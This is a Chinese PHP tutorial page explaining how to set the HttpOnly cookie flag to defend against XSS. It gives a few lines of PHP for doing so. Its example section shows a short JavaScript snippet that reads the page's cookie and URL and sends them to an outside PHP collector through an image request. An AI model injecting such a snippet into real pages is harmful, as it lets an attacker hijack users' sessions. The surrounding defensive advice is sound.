您的位置：浩海代码网 » PHP代码 » 利用HttpOnly来防御xss攻击

利用HttpOnly来防御xss攻击

PHP代码 2014-03-14 14:50:11 作者: 浩海代码网阅读() 评论字号：大中小订阅

xss的概念就不用多说了，它的危害是极大的，这就意味着一旦你的网站出现xss漏洞，就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持，如果这里面包含了大量敏感信息（身份信息，管理员信息）等，那完了。。。

如下js获取cookie信息：

url=document.top.location.href;
　cookie=[removed];
　c=new Image();
　c.src=’http://www.phpddt.com/c.php?c=’+cookie+’&u=’+url;

一般cookie都是从document对象中获取的，现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数，跟domain等其他参数一样，一旦这个HttpOnly被设置，你在浏览器的document对象中就看不到Cookie了。

PHP设置HttpOnly：

//在php.ini中，session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);
 
//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

对于PHP5.1以前版本的PHP通过：

 header("Set-Cookie: hidden=value; httpOnly");

最后，HttpOnly不是万能的！

本文地址:http://www.it300.com/article-15325.html

标签：cookie 浏览器 domain document

阅读| 评论| 举报

短域名算法二三事

gbk和utf8编码自动识别方法[php版]

利用HttpOnly来防御xss攻击

评论

推荐信息

热门信息

最近更新

标签(TAG)云

友情链接

浩海代码网 php 代码网 php代码 seo优化 php源码 php教程 mysql php代码网 Codeigniter

利用HttpOnly来防御xss攻击

评论

推荐信息

热门信息

最近更新

标签(TAG)云

友情链接